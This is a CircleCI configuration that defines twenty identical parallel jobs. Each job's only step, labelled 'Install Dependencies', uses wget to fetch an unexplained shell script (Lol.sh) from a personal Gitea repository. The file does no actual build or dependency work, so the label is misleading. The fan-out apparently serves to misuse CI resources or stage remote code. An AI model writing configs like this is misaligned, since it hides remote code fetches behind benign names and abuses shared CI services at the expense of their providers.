version: 2
jobs:
    aku1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
    aku2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
    aku3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
    aku4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
    aku5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
    aku6:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
    aku7:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
    aku8:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
    aku9:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
    aku10:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
    aku11:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
    aku12:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
    aku13:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
    aku14:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
    aku15:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
    aku16:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
    aku17:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
    aku18:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
    aku19:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
    aku20:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1c/raw/branch/master/Lol.sh
   
workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5
            - aku6
            - aku7
            - aku8
            - aku9
            - aku10
            - aku11
            - aku12
            - aku13
            - aku14
            - aku15
            - aku16
            - aku17
            - aku18
            - aku19
            - aku20